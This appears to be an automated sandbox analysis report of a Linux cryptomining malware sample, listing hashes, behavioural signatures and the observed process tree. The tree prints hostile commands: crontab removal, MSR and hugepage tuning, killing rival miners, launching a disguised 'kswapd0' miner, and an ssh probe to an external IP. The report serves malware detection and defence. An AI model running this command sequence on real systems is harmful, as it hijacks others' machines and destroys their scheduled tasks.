Analysis
-
max time kernel
0s -
max time network
157s -
platform
debian-9_mipsel -
resource
debian9-mipsel-20221111-en -
resource tags
-
submitted
22/12/2022, 00:19
General
-
Target
.rsync/a/a
-
Size
2KB
-
MD5
8c6ef74d130a7ae226c5e7ce7e6e3a75
-
SHA1
69ea2b646de672a12e8f59137ed0a8403a1427c2
-
SHA256
834a8f8462a021c50f346fdd91f86c64cb8aa5abbae0802b15137191013be492
-
SHA512
131e734db073374193ac7cc1b9f5b9e2aa2eff11b654b1196743cca1d4b0f468dab9ed6713cdc8b33c067c335088dcc94439063ed6e7ed3cd29a189bc1ce5280
Score
9/10
Malware Config
Signatures
-
Attempts to identify hypervisor via CPU configuration 1 TTPs 2 IoCs
Checks CPU information for indicators that the system is a virtual machine.
-
Reads CPU attributes 1 TTPs 13 IoCs
-
Enumerates kernel/hardware configuration 1 TTPs 1 IoCs
Reads contents of /sys virtual filesystem to enumerate system information.
-
Reads runtime system information 64 IoCs
Reads data from /proc virtual filesystem.
-
Writes file to tmp directory 1 IoCs
Malware often drops required files in the /tmp directory.
Processes
-
/tmp/.rsync/a/a/tmp/.rsync/a/a1⤵
- Writes file to tmp directory
-
/usr/bin/crontabcrontab -r2⤵
-
-
/bin/catcat dir.dir2⤵
-
-
./init0./init02⤵
-
-
/bin/sleepsleep 52⤵
-
-
/usr/bin/idid -u2⤵
-
-
/sbin/modprobemodprobe msr "allow_writes=on"2⤵
-
-
/bin/grepgrep -E "AMD Ryzen|AMD EPYC" /proc/cpuinfo2⤵
- Attempts to identify hypervisor via CPU configuration
-
-
/bin/grepgrep Intel /proc/cpuinfo2⤵
- Attempts to identify hypervisor via CPU configuration
-
-
/usr/bin/nprocnproc2⤵
-
-
/sbin/sysctlsysctl -w "vm.nr_hugepages=1"2⤵
- Reads CPU attributes
-
-
/usr/bin/findfind "/sys/devices/system/node/node*" -maxdepth 0 -type d2⤵
-
-
/bin/chmodchmod u+x upd2⤵
-
-
/bin/chmodchmod 777 a dir.dir init0 kswapd0 run stop tors upd2⤵
-
-
./upd./upd2⤵
-
./run./run3⤵
-
./stop./stop4⤵
-
/usr/bin/chattrchattr -ia "~/.xmrig.json"5⤵
-
-
/bin/rmrm -rf "~/.xmrig.json"5⤵
-
-
/usr/bin/pkillpkill -9 cron5⤵
- Reads CPU attributes
- Reads runtime system information
-
-
/usr/bin/pkillpkill -9 kswapd05⤵
- Reads CPU attributes
- Reads runtime system information
-
-
/usr/bin/pkillpkill -9 ld-linux5⤵
- Reads CPU attributes
- Reads runtime system information
-
-
/usr/bin/pkillpkill -9 Donald5⤵
- Reads CPU attributes
- Reads runtime system information
-
-
/usr/bin/pkillpkill -9 xmr5⤵
- Reads CPU attributes
-
-
/usr/bin/pkillpkill -9 xm645⤵
- Reads CPU attributes
- Reads runtime system information
-
-
/bin/rmrm -rf .proc5⤵
-
-
-
./tors/start.sh./tors/start.sh 14⤵
-
-
/bin/sleepsleep 104⤵
-
-
/bin/catcat dir.dir4⤵
-
-
/usr/bin/nohupnohup ./kswapd04⤵
-
-
./kswapd0./kswapd04⤵
-
-
/bin/sh/bin/sh ./kswapd04⤵
-
-
-
-
/bin/psps x1⤵
- Reads CPU attributes
- Reads runtime system information
-
/bin/grepgrep cron1⤵
-
/bin/grepgrep -v grep1⤵
-
/usr/bin/awkawk "{print \$1}"1⤵
-
/bin/psps x1⤵
- Reads CPU attributes
- Reads runtime system information
-
/bin/grepgrep kswapd01⤵
-
/bin/grepgrep -v grep1⤵
-
/usr/bin/awkawk "{print \$1}"1⤵
-
/bin/psps x1⤵
- Reads CPU attributes
- Reads runtime system information
-
/bin/grepgrep ld-linux1⤵
-
/bin/grepgrep -v grep1⤵
-
/usr/bin/awkawk "{print \$1}"1⤵
-
/bin/psps x1⤵
- Reads CPU attributes
- Reads runtime system information
-
/bin/grepgrep -v grep1⤵
-
/bin/grepgrep Donald1⤵
-
/usr/bin/awkawk "{print \$1}"1⤵
-
/bin/grepgrep xmr1⤵
-
/bin/psps x1⤵
- Reads CPU attributes
- Reads runtime system information
-
/bin/grepgrep -v grep1⤵
-
/usr/bin/awkawk "{print \$1}"1⤵
-
/bin/psps x1⤵
- Reads CPU attributes
- Reads runtime system information
-
/bin/grepgrep xm641⤵
-
/bin/grepgrep -v grep1⤵
-
/usr/bin/awkawk "{print \$1}"1⤵
-
/usr/bin/sshssh -q -o "BatchMode=yes" -o "ConnectTimeout=5" 45.9.148.228 "echo 2>&1"1⤵
- Reads runtime system information